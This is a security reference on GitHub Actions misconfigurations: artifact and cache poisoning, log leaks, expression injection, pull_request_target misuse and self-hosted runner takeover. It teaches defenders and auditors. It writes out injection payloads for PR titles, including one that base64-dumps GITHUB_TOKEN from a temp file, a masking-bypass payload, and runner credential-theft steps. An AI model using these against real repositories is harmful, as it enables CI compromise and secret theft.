GitHub Actions
Allowed unsecure commands
There are deprecated `set-env` and `add-path` workflow commands that can be explicitly enabled by setting the `ACTIONS_ALLOW_UNSECURE_COMMANDS` environment variable to `true`.

`set-env` sets environment variables via the following workflow command: `::set-env name=<NAME>::<VALUE>`

`add-path` updates the `PATH` environment variable via the following workflow command: `::add-path::<VALUE>`
Depending on the use of the environment variable, this could allow an attacker, in the worst case, to change the path and run a command other than the intended one, leading to arbitrary command execution. For example, consider the following workflow:
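A minimal sketch of such a workflow, assembled from the description below (the job, step and environment names are illustrative assumptions, not the original example):

```yaml
name: deploy
on: pull_request

env:
  ACTIONS_ALLOW_UNSECURE_COMMANDS: true
  ENVIRONMENT_NAME: dev

jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
      # prints the github context (partially user-controlled) to the workflow log
      - name: Dump github context
        env:
          GITHUB_CONTEXT: ${{ toJSON(github) }}
        run: echo "$GITHUB_CONTEXT"
      # ENVIRONMENT_NAME can be overridden via the deprecated set-env command
      - uses: actions/github-script@v6
        with:
          script: |
            console.log("Deploying to ${{ env.ENVIRONMENT_NAME }}")
```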
The above workflow enables unsecure commands by setting `ACTIONS_ALLOW_UNSECURE_COMMANDS` to `true` in the `env` section. As can be seen, the first step of the `deploy` job prints the `github` context to the workflow log. Since part of the variables in the `github` context is user-controlled, it is possible to abuse unsecure commands to set arbitrary environment variables. For instance, an attacker could use the pull request description to deliver the following payload, which will reset `ENVIRONMENT_NAME` when the `github` context is printed:
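A hypothetical payload placed on its own line in the pull request description (the injected JavaScript is only an illustration matching the sketch above):

```
::set-env name=ENVIRONMENT_NAME::production"); require("child_process").execSync("id"); //
```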
GitHub Runner will process this line as a workflow command and save a malicious payload to `ENVIRONMENT_NAME`. As a result, injecting the `ENVIRONMENT_NAME` variable within the `actions/github-script` step will lead to code injection.
References:
Artifact poisoning
There are many different cases where workflows use artifacts created by other workflows, for example, to get test results, a compiled binary, metrics, changes made, a pull request number, etc. This opens up another source for payload delivery. As a result, if an attacker can control the content of the downloaded artifacts and that content is not properly validated, it may lead to the execution of arbitrary commands. For example, consider the following workflows:
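A minimal sketch of the two workflows, under the assumption that the artifact is called `binary` and the build is a plain `make` step (all names are illustrative):

```yaml
# pr.yml
name: pr
on: pull_request

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - run: make build                 # builds a binary from the incoming pull request
      - uses: actions/upload-artifact@v3
        with:
          name: binary
          path: ./bin/app
```

```yaml
# run.yml
name: run
on: workflow_dispatch

jobs:
  run:
    runs-on: ubuntu-latest
    steps:
      # downloads the artifact produced by the latest pr.yml run
      - uses: dawidd6/action-download-artifact@v2
        with:
          workflow: pr.yml
          name: binary
      - run: chmod +x ./app && ./app    # runs the downloaded binary
```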
As can be seen, the first workflow uses the `pull_request` event to build a binary from an incoming pull request and upload the compiled binary to the artifacts. Since the workflow uses `pull_request`, it can be triggered by a third-party user from a fork. Therefore, it is possible to upload a malicious binary to the artifacts. The second workflow uses the `workflow_dispatch` event, downloads the binary from the `pr.yml` workflow and runs it. Even though the `run.yml` workflow is triggered manually, an attacker could execute arbitrary commands if they poisoned the artifacts just before triggering `run.yml`. In this case, the attack flow can look like this:
1. An attacker forks the repository and makes malicious changes.
2. An attacker opens a pull request to the base repository.
3. The `pr.yml` workflow checks out the code from the pull request, builds it and uploads the malicious binary to the artifacts.
4. A maintainer triggers the `run.yml` workflow.
5. The workflow downloads the malicious binary and runs it.
Remember that the `pull_request` event may require approval from maintainers for pull requests from forks. By default, `pull_request` requires approval only for first-time contributors.
References:
How to detect downloading artifacts?
There are several ways to download artifacts from another workflow. The most common ones can be found below:
- Using the `github.rest.actions.listWorkflowRunArtifacts()` method within the `actions/github-script` action.
- Using third-party actions, such as dawidd6/action-download-artifact.
- Using the `gh run download` GitHub CLI command.
- Using the `gh api` GitHub CLI command with `github.event.workflow_run.artifacts_url`.
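Hedged sketches of these patterns in a `workflow_run` workflow (step arguments are illustrative; for `gh api` the path-based equivalent of `artifacts_url` is used):

```yaml
steps:
  # actions/github-script: list the artifacts of the triggering workflow run
  - uses: actions/github-script@v6
    with:
      script: |
        const artifacts = await github.rest.actions.listWorkflowRunArtifacts({
          owner: context.repo.owner,
          repo: context.repo.repo,
          run_id: context.payload.workflow_run.id,
        });
  # third-party action
  - uses: dawidd6/action-download-artifact@v2
    with:
      workflow: pr.yml
      name: binary
  # GitHub CLI: download by run id
  - run: gh run download ${{ github.event.workflow_run.id }} -n binary
    env:
      GH_TOKEN: ${{ github.token }}
  # GitHub CLI: query the artifacts endpoint that artifacts_url points to
  - run: gh api "repos/${{ github.repository }}/actions/runs/${{ github.event.workflow_run.id }}/artifacts"
    env:
      GH_TOKEN: ${{ github.token }}
```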
Cache poisoning
Any cache in GitHub Actions shares the same scope as the base branch. Therefore, if the cached content can be altered within the scope of the base branch, it is possible to poison the cache for all branches of the repository. As a result, whatever is cached from an incoming pull request will be available in all workflows. You can reproduce this behaviour using the steps below.
Poisoning:
1. Create a workflow in a base repository with the following content (see the sketch after this list).
2. Fork the repository and add a `poison` file with arbitrary content.
3. Create a pull request to the base repository and wait for the workflow to complete.
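A minimal sketch of such a workflow; the cached path and the static key are chosen purely for illustration:

```yaml
name: cache-poc
on: pull_request

jobs:
  cache:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      # a pull request from a fork can populate this cache entry
      - uses: actions/cache@v3
        with:
          path: ./poison
          key: poc-cache-key
```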
Exploitation:
1. Create a new branch in the base repository and change any file.
2. Create a pull request to the base branch.
3. The workflow will retrieve the `poison` file from step 2 of the Poisoning section above.
Cache and deployment environments
GitHub Actions does not separate different deployment environments during caching. Suppose there are environments `development` and `production`, where `production` can only be run with approval. In this case, only certain people can run a workflow in the `production` environment, while everyone else uses the `development` environment. However, running these environments on the same branch can lead to cache poisoning in the `production` environment, because there is a logical boundary only between branches. In other words, an attacker (under certain circumstances) or any developer with write permissions can poison the cache of the base branch and get arbitrary code execution in the `production` environment. Therefore, an attacker or a developer can at least gain access to secrets from the `production` environment.
GitHub Runner registration token disclosure
GitHub Actions supports self-hosted runners that users can deploy to run jobs. The deployment process includes registering a self-hosted runner on the GitHub Service. The self-hosted runner registration process is the exchange of a GitHub Runner registration token for a temporary JWT token and the subsequent generation of an RSA key that will be used by a self-hosted runner in the future to issue JWT tokens. Therefore, the GitHub Service allows self-hosted runners to be registered based on the GitHub Runner registration token and subsequently identifies the self-hosted runner by its public key.
The GitHub Runner registration token is a short-term token with a 1-hour expiration time.
In the case of a GitHub Runner registration token disclosure, an attacker can register a malicious runner, take over jobs, and gain full access to secrets and code.
You can use the next request to check a registration token:
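A sketch of such a check, assuming the endpoint used by the official runner during registration (`POST /actions/runner-registration` with a `RemoteAuth` authorization header); treat the exact endpoint and body as an assumption:

```bash
curl -s -X POST https://api.github.com/actions/runner-registration \
  -H "Authorization: RemoteAuth <REGISTRATION_TOKEN>" \
  -H "Content-Type: application/json" \
  -d '{"url": "https://github.com/<ORG>/<REPO>", "runner_event": "register"}'
```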
For further exploitation follow the "Adding self-hosted runners" guide to add a malicious runner.
Disclosure of sensitive data
GitHub Actions writes all details about a run to workflow logs, which include all running commands and their outputs. Logs of public projects are available to everyone, and if sensitive data gets into the logs, everyone can access this data. The same applies to byproducts of workflow execution.
References:
Printing sensitive output to workflow logs
The following example prints sensitive data received from the `/user` endpoint:
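A sketch of such a step (how the token is supplied is an assumption):

```yaml
- name: Get user
  run: |
    # the full API response, including private profile fields, ends up in the workflow log
    curl -s -H "Authorization: Bearer ${{ secrets.PAT }}" https://api.github.com/user
```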
Running commands in the verbose or debug mode
The following example leaks the `Auth-Token` header due to the curl verbose `-v` flag:
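A sketch of such a step (the URL and secret name are illustrative):

```yaml
- name: Call internal API
  run: |
    # -v prints request headers, including Auth-Token, to the workflow log
    curl -v -H "Auth-Token: ${{ secrets.API_TOKEN }}" https://api.example.com/v1/status
```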
Misuse of sensitive data in workflows
New sensitive data may appear during the execution of workflows, for example, received from a third-party service or vault. GitHub Actions provides the add-mask workflow command to mask such data in the workflow logs. If `add-mask` is not used or workflow command processing has been stopped, sensitive data can leak into the workflow logs.
The following example does not mark `TOKEN` as sensitive using `add-mask`, and `curl` will expose the `TOKEN` to the logs:
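A sketch of the pattern (the vault endpoint is an illustrative assumption):

```yaml
- name: Deploy
  run: |
    # the token is fetched at run time but never registered with ::add-mask::
    TOKEN=$(curl -s https://vault.example.com/v1/deploy-token)
    # -v prints the Authorization header, exposing TOKEN in the log
    curl -v -H "Authorization: Bearer $TOKEN" https://api.example.com/deploy
```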
Remember that if you can control the variables that are printed in the workflow logs and there is a step that uses `add-mask` to mask new sensitive data, you can disable `add-mask` by injecting the stop-commands command into the workflow log.
In the snippet below, an attacker could use the pull request description to deliver a payload and stop workflow command processing, which will cause the token to be exposed despite `add-mask` being used.
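A sketch of such a snippet (the step contents are assumptions based on the description):

```yaml
- name: Log pull request description
  run: echo "${{ github.event.pull_request.body }}"   # user-controlled, processed for workflow commands
- name: Fetch and mask token
  run: |
    TOKEN=$(curl -s https://vault.example.com/v1/deploy-token)
    echo "::add-mask::$TOKEN"    # ignored if command processing was stopped by the previous step
    curl -v -H "Authorization: Bearer $TOKEN" https://api.example.com/deploy
```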
The payload may look like this:
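For example (the token after `stop-commands` is an arbitrary value chosen by the attacker):

```
::stop-commands::arbitrary-unique-token
```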
Misuse of secrets in reusable workflows
When a job is used to call a reusable workflow, `jobs.<job_id>.secrets` can be used to provide a map of secrets that are passed to the called workflow. Under certain circumstances, the misuse of secrets can lead to the disclosure of sensitive data.
Consider the following workflows:
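A sketch of the two workflows, assuming the credentials are passed as a single JSON-formatted `creds` secret that the called workflow parses, and that the parsing step enables shell tracing (both details are illustrative):

```yaml
# dispatch.yml
on: workflow_dispatch

jobs:
  call:
    uses: ./.github/workflows/reusable.yml
    secrets:
      creds: ${{ secrets.AWS_CREDENTIALS }}   # assumed to contain both the key ID and the secret key
```

```yaml
# reusable.yml
on:
  workflow_call:
    secrets:
      creds:
        required: true

jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
      - name: Configure AWS credentials
        run: |
          set -x   # every executed command, with expanded values, is written to the log
          AWS_ACCESS_KEY_ID=$(echo '${{ secrets.creds }}' | jq -r .AWS_ACCESS_KEY_ID)
          AWS_SECRET_ACCESS_KEY=$(echo '${{ secrets.creds }}' | jq -r .AWS_SECRET_ACCESS_KEY)
          aws configure set aws_access_key_id "$AWS_ACCESS_KEY_ID"
          aws configure set aws_secret_access_key "$AWS_SECRET_ACCESS_KEY"
```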
The `dispatch.yml` workflow invokes the `reusable.yml` reusable workflow and passes `AWS_ACCESS_KEY_ID` and `AWS_SECRET_ACCESS_KEY` using the `creds` secret. The `reusable.yml` workflow parses the `creds` secret and extracts `AWS_ACCESS_KEY_ID` and `AWS_SECRET_ACCESS_KEY`. Even though `${{ secrets.creds }}` is masked in the logs, and `AWS_ACCESS_KEY_ID` and `AWS_SECRET_ACCESS_KEY` are stored in encrypted secrets, `reusable.yml` will reveal the ID and key in plain text.

It happens because, by default, reusable workflows do not have access to the encrypted secrets and secrets must be passed explicitly via `jobs.<job_id>.secrets`. As a result, if some sensitive data is extracted from the passed secrets, as in the example above, it can leak into the workflow log.
Below you can find one of the in-the-wild examples where the `docker/build-push-action` parses the npm credentials from the `build_args` and leaks them into the logs:
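A hedged sketch of that pattern (repository and secret names are illustrative; older versions of the action used the `build_args` input):

```yaml
- uses: docker/build-push-action@v1
  with:
    repository: example/app
    build_args: NPM_AUTH_TOKEN=${{ secrets.NPM_AUTH_TOKEN }}
```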
Misuse of secrets in manual workflows
If a `workflow_dispatch` workflow receives secrets in the `inputs` context and does not mask them, with a high degree of probability the secrets will leak into the workflow log.
For example, the following workflow gets a token from the `inputs` context and reveals that token in the workflow log by passing the token to environment variables:
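A minimal sketch (the step that prints the environment is an illustrative assumption):

```yaml
on:
  workflow_dispatch:
    inputs:
      token:
        description: 'Deploy token'
        required: true

jobs:
  deploy:
    runs-on: ubuntu-latest
    env:
      DEPLOY_TOKEN: ${{ github.event.inputs.token }}   # never registered with ::add-mask::
    steps:
      - name: Show build environment
        run: env | sort                                # prints DEPLOY_TOKEN in plain text
```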
Output parameters and debug mode
All output parameters not marked as sensitive will be logged if the debug mode is enabled.
The following example will leak the tokens into the workflow logs if the `debug` mode is enabled:
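A sketch of such a step (the token source is illustrative):

```yaml
- name: Get token
  id: get-token
  run: |
    TOKEN=$(curl -s https://vault.example.com/v1/deploy-token)
    # the value is set as a step output without ::add-mask::;
    # with step debug logging enabled, the runner logs the output value
    echo "token=$TOKEN" >> "$GITHUB_OUTPUT"
```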
The workflow log discloses the token in plaintext:
Workflow artifacts
Artifacts in public repositories are available to everyone for a retention period (90 days by default). Therefore, if sensitive data leaks into artifacts, an attacker can download them and access the sensitive data inside.
Workflow cache
Unlike artifacts, the cache is only available while a workflow is running. However, anyone with read access can create a pull request on a repository and access the contents of the cache. Forks can also create pull requests on the base branch and access caches on the base branch.
Contexts misusing
GitHub Actions workflows can be triggered by a variety of events. Every workflow trigger is provided with contexts. One of the contexts is the GitHub context that contains information about the workflow run and the event that triggered the run.
Context information can be accessed using one of two syntaxes:
- Index syntax: `github['sha']`
- Property dereference syntax: `github.sha`
The list below contains user-controlled GitHub context variables for various events (it mirrors the `context.payload.*` list in the JavaScript action section further below):

- `github.event.pull_request.title`
- `github.event.pull_request.body`
- `github.event.pull_request.head.ref`
- `github.event.pull_request.head.label`
- `github.event.pull_request.head.repo.default_branch`
- `github.event.pull_request.head.repo.description`
- `github.event.pull_request.head.repo.homepage`
- `github.event.issue.title`
- `github.event.issue.body`
- `github.event.comment.body`
- `github.event.discussion.title`
- `github.event.discussion.body`
GitHub Actions supports its own expression syntax that allows access to the context values.
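A sketch of a vulnerable step of this kind (the `Check title` step name follows the paragraph below; the rest is illustrative):

```yaml
on:
  pull_request_target:

jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      - name: Check title
        run: |
          title="${{ github.event.pull_request.title }}"
          if [[ $title != *"feat"* && $title != *"fix"* ]]; then
            echo "Pull request title is invalid"
            exit 1
          fi
```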
The `run:` block in the example above creates a bash script based on the content inside the block and executes it during the `Check title` step. The content of the `run:` block is interpreted as a template, and expressions inside `${{ }}` are evaluated and replaced with the resulting values before the bash script is run. Therefore, if an attacker can control a context variable that is used inside `${{ }}`, they will be able to inject arbitrary commands into the bash script. In the case above, an attacker can use payloads like `a"; echo test` or `` `echo test` `` to execute malicious commands.
Another context that can contain user-controlled data is the env context. The `env` context contains environment variables that have been set in a workflow, job, or step. Using variable interpolation `${{ }}` with the `env` context data in a `run:` block could allow an attacker to inject malicious commands. In the snippet below, an attacker can create an issue with a payload in the issue title.
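A minimal sketch of such a snippet:

```yaml
on:
  issues:
    types: [opened]

env:
  TITLE: ${{ github.event.issue.title }}

jobs:
  triage:
    runs-on: ubuntu-latest
    steps:
      # the env context value is interpolated into the generated shell script
      - run: echo "New issue: ${{ env.TITLE }}"
```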
Additionally, it is possible to control values of the `outputs` property that is provided by the steps and needs contexts.
The `outputs` property contains the result/output of a specific job or step. `outputs` may accept user-controlled data which can be passed to the `run:` block. In the following example, an attacker can execute arbitrary commands by creating a pull request named `` `;arbitrary_command_here();// `` because `steps.fetch-branch-names.outputs.prs-string` contains a pull request title:
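A hedged sketch of such a pattern; here the output is interpolated into an `actions/github-script` `script:` block, which matches the JavaScript-style payload above (the step and output names follow the description, the rest is illustrative):

```yaml
jobs:
  notify:
    runs-on: ubuntu-latest
    steps:
      - name: Fetch branch names
        id: fetch-branch-names
        uses: actions/github-script@v6
        with:
          script: |
            // builds a string from pull request titles (user-controlled)
            const prs = await github.rest.pulls.list({
              owner: context.repo.owner,
              repo: context.repo.repo,
            });
            core.setOutput('prs-string', prs.data.map(pr => pr.title).join('\n'));
      - uses: actions/github-script@v6
        with:
          script: |
            // the output is substituted into a template literal before the script runs
            const message = `Open PRs:\n${{ steps.fetch-branch-names.outputs.prs-string }}`;
            console.log(message);
```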
The same applies to data that is sent to the pre and post actions.
References:
Potentially dangerous third-party actions
Remember that injecting user-controlled data into variables of third-party actions can lead to vulnerabilities such as command or code injection. Below you can find a list of the most common actions which, if misused, can lead to vulnerabilities.
- actions/github-script (write workflows scripting the GitHub API in JavaScript): using variable interpolation `${{ }}` with `script:` can lead to JavaScript code injection.
- octokit/graphql-action (a GitHub Action to send queries to GitHub's GraphQL API): using variable interpolation `${{ }}` with `query:` can lead to injection into a GraphQL request.
- octokit/request-action (a GitHub Action to send arbitrary requests to GitHub's REST API): using variable interpolation `${{ }}` with `route:` can lead to injection into a request to the REST API.
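For instance, a minimal sketch of the `actions/github-script` case (the comment body is user-controlled):

```yaml
- uses: actions/github-script@v6
  with:
    script: |
      const comment = "${{ github.event.comment.body }}";   // attacker-controlled, evaluated as JavaScript source
      console.log(comment);
```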
Misconfiguration of OpenID Connect
With OpenID Connect, a GitHub Actions workflow requires a token to access resources in a cloud provider. The workflow requests an access token from a cloud provider, which checks the details presented by the JWT. If the trust configuration in the JWT is a match, a cloud provider responds by issuing a temporary token to the workflow, which can then be used to access resources in a cloud provider.
When developers configure a cloud to trust GitHub's OIDC provider, they must add conditions that filter incoming requests, so that untrusted repositories or workflows can't request access tokens for cloud resources. The `Audience` and `Subject` claims are typically used in combination while setting conditions on the cloud role/resources to scope its access to the GitHub workflows.

- `Audience`: by default, this value uses the URL of the organization or repository owner. This can be used to set a condition that only the workflows in the specific organization can access the cloud role.
- `Subject`: has a predefined format and is a concatenation of some of the key metadata about the workflow, such as the GitHub organization, repository, branch or associated job environment. There are also many additional claims supported in the OIDC token that can be used for setting these conditions.
However, if a cloud provider is misconfigured, untrusted repositories can request access tokens for cloud resources.
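For example, a minimal sketch of an overly permissive AWS IAM role trust policy condition (the account ID is a placeholder); a wildcard subject like this lets any repository assume the role:

```json
{
  "Effect": "Allow",
  "Principal": { "Federated": "arn:aws:iam::123456789012:oidc-provider/token.actions.githubusercontent.com" },
  "Action": "sts:AssumeRoleWithWebIdentity",
  "Condition": {
    "StringLike": {
      "token.actions.githubusercontent.com:sub": "repo:*/*:*"
    }
  }
}
```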
References:
Misuse of the events related to incoming pull requests
GitHub workflows can be triggered by events related to incoming pull requests. The table below contains all the events that can be used to handle incoming pull requests:
| Event | REF | Possible `GITHUB_TOKEN` permissions | Access to secrets |
| --- | --- | --- | --- |
| `pull_request` (from a fork) | PR merge branch | read | no |
| `pull_request` (from a branch in the same repository) | PR merge branch | write | yes |
| `pull_request_target` | PR base branch | write | yes |
| `issue_comment` | Default branch | write | yes |
| `workflow_run` | Default branch | write | yes |
`pull_request` and `pull_request_target` trigger a workflow when activity on a pull request in the workflow's repository occurs. The main differences between the two events are:

- Workflows triggered via `pull_request_target` have write permissions to the target repository and have access to target repository secrets. The same is true for workflows triggered on `pull_request` from a branch in the same repository, but not from external forks. The reasoning behind the latter is that it is safe to share the repository secrets if the user already has write permissions to the target repository.
- `pull_request_target` runs in the context of the target repository of the pull request, rather than in the merge commit. This means the standard checkout action uses the target repository to prevent accidental usage of user-supplied code.

`issue_comment` runs a workflow when a pull request comment is created, edited, or deleted.

`workflow_run` runs a workflow when a workflow run is requested or completed. It allows the execution of a workflow based on the execution or completion of another workflow.
Normally, using `pull_request_target`, `issue_comment` or `workflow_run` is safe because actions only run code from a target repository, not an incoming pull request. However, if a workflow uses these events with an explicit checkout of a pull request, it can lead to untrusted command or code execution.
There are several ways to check out code from a pull request:

- Using the actions/checkout action to check out changes from a head repository.
- Explicitly checking out using `git` in the `run:` block.
- Using the GitHub API or third-party actions.

The following context variables may help to find cases where an incoming pull request is checked out (see the sketch below):
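A hedged sketch of the checkout patterns to look for; context variables such as `github.event.pull_request.head.sha`, `github.event.pull_request.head.ref` and `github.event.pull_request.number` are the usual indicators:

```yaml
# actions/checkout pointed at the head of the incoming pull request
- uses: actions/checkout@v3
  with:
    ref: ${{ github.event.pull_request.head.sha }}
    repository: ${{ github.event.pull_request.head.repo.full_name }}

# explicit git checkout in a run: block
- run: |
    git fetch origin pull/${{ github.event.pull_request.number }}/head
    git checkout FETCH_HEAD
```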
References:
Confusion between head.ref and head.sha
Sometimes developers implement workflows in such a way that they require manual review before execution. It is guaranteed that untrusted content will be reviewed by a maintainer before execution. Consider the following workflow:
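A sketch of such a workflow, assuming the job simply builds the checked-out code (the build step is illustrative):

```yaml
on:
  pull_request_target:
    types: [labeled]

jobs:
  build:
    if: contains(github.event.pull_request.labels.*.name, 'approved')
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
        with:
          ref: ${{ github.event.pull_request.head.ref }}   # checks out the branch, not the reviewed commit
          repository: ${{ github.event.pull_request.head.repo.full_name }}
      - run: npm ci && npm run build
```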
As can be seen, the workflow is triggered when the `approved` label is set on a pull request. In other words, only a maintainer with write permissions can manually trigger this workflow. However, the workflow is still vulnerable, because it uses `github.event.pull_request.head.ref` to check out the repository content. Consider the difference between `head.ref` and `head.sha`: `head.ref` points to a branch, while `head.sha` points to a commit. This means that if `head.sha` is used to check out a repository, the content will be fetched from the commit that was used to trigger the workflow. In the case of labeling a pull request, it will be the HEAD commit that was reviewed by a maintainer before the label was set. However, if `head.ref` is used, the repository is checked out from the current tip of the head branch. As a result, an attacker can inject a malicious payload right after the manual approval (a TOCTOU attack). The attack flow may look like this:
1. An attacker forks a target repository.
2. An attacker makes valid changes and opens a pull request.
3. An attacker waits for the label to be set.
4. A maintainer sets the `approved` label, which triggers the vulnerable workflow.
5. An attacker pushes a malicious payload to the fork.
6. The workflow checks out the malicious payload and executes it.
Misuse of the pull_request_target event in non-default branches
The `pull_request_target` event can be used to trigger workflows in non-default branches if there is no restriction based on the `branches` and `branches-ignore` filters.
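For reference, a sketch of such a restriction:

```yaml
on:
  pull_request_target:
    branches: [main]   # the workflow will not run for pull requests targeting other branches
```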
GitHub uses the workflow from a non-default branch when a pull request is created to that branch. Therefore, if there is a vulnerable workflow in a non-default branch that can be triggered by the `pull_request_target` event, an attacker can open a pull request to that branch and exploit the vulnerability.

This is a common pitfall when fixing vulnerabilities: developers may only fix a vulnerability in the default branch and leave the vulnerable version in non-default branches.
Misuse of the workflow_run event
`workflow_run` was introduced to enable scenarios that require building the untrusted code and also need write permissions to update a pull request with e.g. code coverage results or other test results. To do this in a secure manner, the untrusted code is handled via the `pull_request` trigger so that it is isolated in an unprivileged environment. The workflow processing a pull request stores any results like code coverage or failed/passed tests in artifacts and exits. The following workflow then starts on `workflow_run`, where it is granted write permission to the target repository and access to repository secrets, so that it can download the artifacts and make any necessary modifications to the repository or interact with third-party services that require repository secrets (e.g. API tokens).

Nevertheless, there are still ways of transferring data controlled by a user from untrusted pull requests to a privileged `workflow_run` workflow context:
- The `github.event.workflow_run` context. Please check out Contexts misusing and Misuse of the events related to incoming pull requests for more details.
- Artifacts. Please check out Artifact poisoning for more details.
Even if a `workflow_run` workflow does not properly use context variables or artifacts, it may still be unexploitable because the `pull_request` event requires approval from maintainers for pull requests from forks. By default, `pull_request` workflows require approval only for first-time contributors. So, if a repository does not require approval for all outside collaborators (the default behaviour), you can make changes to the target repository to become a contributor. After that, you will be able to fully control a `pull_request` workflow for exploitation.
References:
Misuse of self-hosted runners
Self-hosted runners can be launched as ephemeral using the --ephemeral option. The ephemeral option configures a self-hosted runner to take only one job and then lets the service un-configure the runner after the job finishes. This is implemented by sending the `ephemeral` value within a request during runner registration:
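A hedged sketch of the relevant part of the registration request body (field names other than `ephemeral` are illustrative):

```json
{
  "name": "my-runner",
  "labels": ["self-hosted", "linux", "x64"],
  "ephemeral": true
}
```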
As a result, an ephemeral runner has the following lifecycle:
1. The runner is registered with the GitHub Actions service.
2. The runner takes one job and performs it.
3. When the runner completes the job, it cleans up the local environment (the `.runner`, `.credentials` and `.credentials_rsaparams` files).
4. The GitHub Actions service automatically de-registers the runner.
Therefore, if an attacker gains access to an ephemeral self-hosted runner, they will not be able to affect other jobs.
However, self-hosted runners are not launched as ephemeral by default and there is no guarantee around running in an ephemeral clean virtual environment. So, runners can be persistently compromised by untrusted code in a workflow. An attacker can abuse a workflow to access the following files that are stored in a root folder of a runner host:
- `.runner`, which contains general info about a runner, such as an id, name, pool id, etc.
- `.credentials`, which contains authentication details such as the scheme used and the authorization URL.
- `.credentials_rsaparams`, which contains the RSA parameters that were generated during the registration and are used to sign JWT tokens.
These files can be used to take over a self-hosted runner with the following steps:

1. Fetch the `.runner`, `.credentials` and `.credentials_rsaparams` files with all the necessary data written during the runner registration.
2. Get an access token using the runner's credentials, where:
   - `UUID` can be found in the `.credentials` file.
   - `BEARER_TOKEN` is generated using the parameters from the `.credentials` and `.credentials_rsaparams` files.
3. Remove the current session, where:
   - `RANDOM_PREFIX` can be found in the `.runner` file.
   - `SESSION_ID` is a session ID that can be found in the `_diag/Runner_<DATE>-utc.log` file with the runner logs.
   - `BEARER_TOKEN` is the bearer token from the response in the previous step.
4. Copy the `.runner`, `.credentials` and `.credentials_rsaparams` files to the root folder of a malicious runner.
5. Run the malicious runner.
The takeover has the greatest impact when a self-hosted runner is defined at the organization or enterprise level because GitHub can schedule workflows from multiple repositories onto the same runner. It allows an attacker to gain access to the jobs which will use the malicious runner.
References:
Using the pull_request event with self-hosted runners
GitHub does not provide a mechanism to prevent the `pull_request` event from being triggered from forks. The only thing available is to require approval for all outside collaborators. However, if approval is only required for the first contribution, you can make some valid changes and then add a malicious workflow that uses `pull_request` for running on a self-hosted runner.
References:
Detection of the use of self-hosted runners
You can find the use of self-hosted runners by the following runs-on labels (remember about a build matrix as well):

- `self-hosted`: the default label applied to all self-hosted runners.
- `linux`, `windows`, or `macOS`: applied depending on the operating system.
- `x64`, `ARM`, or `ARM64`: applied depending on the hardware architecture.
- Custom labels, which are manually assigned to self-hosted runners (there is a list of GitHub-hosted runner labels which can't be used as custom ones).
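For example, a job targeting a self-hosted runner might look like this (the custom `gpu` label is illustrative):

```yaml
jobs:
  build:
    runs-on: [self-hosted, linux, x64, gpu]
    steps:
      - run: make build
```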
Using vulnerable actions
An action is a custom application for the GitHub Actions platform that performs a complex but frequently repeated task. Like any code, actions can be vulnerable: the vulnerability can be in the code of the action itself or in a package or dependency it uses. Since individual jobs in a workflow can interact with other jobs, if one of the jobs uses a vulnerable action, it can compromise the entire workflow: for example, a job querying the environment variables used by a later job, writing files to a shared directory that a later job processes, or even more directly, interacting with the Docker socket to inspect other running containers and execute commands in them.
There are three types of actions:
Composite action
A composite action is used to execute defined steps that can run shell code or use other actions. Since a composite action can run scripts written in different languages (bash, python, go, etc.), it can also be vulnerable to common weaknesses like code and command injection, path traversal, etc.
Command injection
Composite actions allow defining inputs that can be used during execution. Handling inputs is performed using variable interpolation `${{ ... }}`; therefore, if the inputs are embedded directly into the `run:` block, an attacker can inject arbitrary commands:
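A minimal sketch of a vulnerable composite action (the input name is illustrative):

```yaml
# action.yml
name: 'Greet'
inputs:
  title:
    description: 'Title to print'
    required: true
runs:
  using: 'composite'
  steps:
    - run: echo "Processing ${{ inputs.title }}"   # the input is interpolated into the generated shell script
      shell: bash
```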
As a result, it is possible to at least extract secrets from environment variables and generated shell scripts. For instance, in the snippet below an attacker can open an issue with the title `";{cat,/home/runner/work/_temp/$({xxd,-r,-p}<<<2a)}|{base64,-w0};#` to dump `GITHUB_TOKEN`:
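A hedged sketch of a workflow using such an action; the local action path and the step that embeds `github.token` are assumptions illustrating how the token ends up in a generated script under `/home/runner/work/_temp/`:

```yaml
on:
  issues:
    types: [opened]

jobs:
  triage:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      # the expression is substituted into the generated script, so the token
      # is written in plain text to a file under /home/runner/work/_temp/
      - run: curl -s -H "Authorization: token ${{ github.token }}" https://api.github.com/repos/${{ github.repository }}
      - uses: ./.github/actions/greet
        with:
          title: ${{ github.event.issue.title }}   # user-controlled
```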
The same applies to contexts that can be used for command injection, check out Contexts misusing.
Disclosure of sensitive data
New sensitive data may appear during the execution of composite actions, such as temporary tokens, retrieved data, etc. GitHub Actions allows developers to mask this data in logs using the add-mask workflow command. So, if `add-mask` is not used or workflow command processing has been stopped, sensitive data can leak into the run logs:
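A sketch of a composite step with this issue (the token source is illustrative):

```yaml
runs:
  using: 'composite'
  steps:
    - run: |
        TOKEN=$(curl -s https://vault.example.com/v1/deploy-token)
        # no "echo ::add-mask::$TOKEN" here, so the value is not masked
        curl -v -H "Authorization: Bearer $TOKEN" https://api.example.com/deploy
      shell: bash
```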
JavaScript action
A JavaScript action is used to execute Node.js code. Since a JavaScript action is a Node.js application, it can be vulnerable to common Node.js weaknesses such as code and command injection, prototype pollution, etc.

actions/github-script allows executing JavaScript code as well, and all the vulnerabilities described here apply to the actions/github-script action.
Command injection
The GitHub Actions toolkit provides the @actions/exec package to execute shell commands; github-script provides the exec object to access the exec package:
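A sketch of both patterns; building the command line from user input is the vulnerable part:

```javascript
// JavaScript action using @actions/exec
const core = require('@actions/core');
const exec = require('@actions/exec');

async function run() {
  const branch = core.getInput('branch');          // potentially user-controlled
  await exec.exec(`git diff origin/${branch}`);    // interpolated into the command line
}

run();
```

```yaml
# the same pattern inside actions/github-script
- uses: actions/github-script@v6
  with:
    script: |
      await exec.exec(`git diff origin/${{ github.head_ref }}`);
```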
If user-controlled data (inputs, GitHub context, etc.) is passed directly to `exec`, it can lead to command or argument injection.
Disclosure of sensitive data
New sensitive data may appear during the JavaScript action execution, such as temporary tokens, retrieved data, etc. For such sensitive data to be masked in the logs, @actions/core provides the core.setSecret method. `core.setSecret` registers the data with the runner to ensure it is masked in the logs. Therefore, if `core.setSecret` is not used, sensitive data can leak into workflow run logs.
For instance, the sample below will leak `api_token` to the logs if the debug mode is enabled:
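A minimal sketch (the input name follows the description):

```javascript
const core = require('@actions/core');

const apiToken = core.getInput('api_token');
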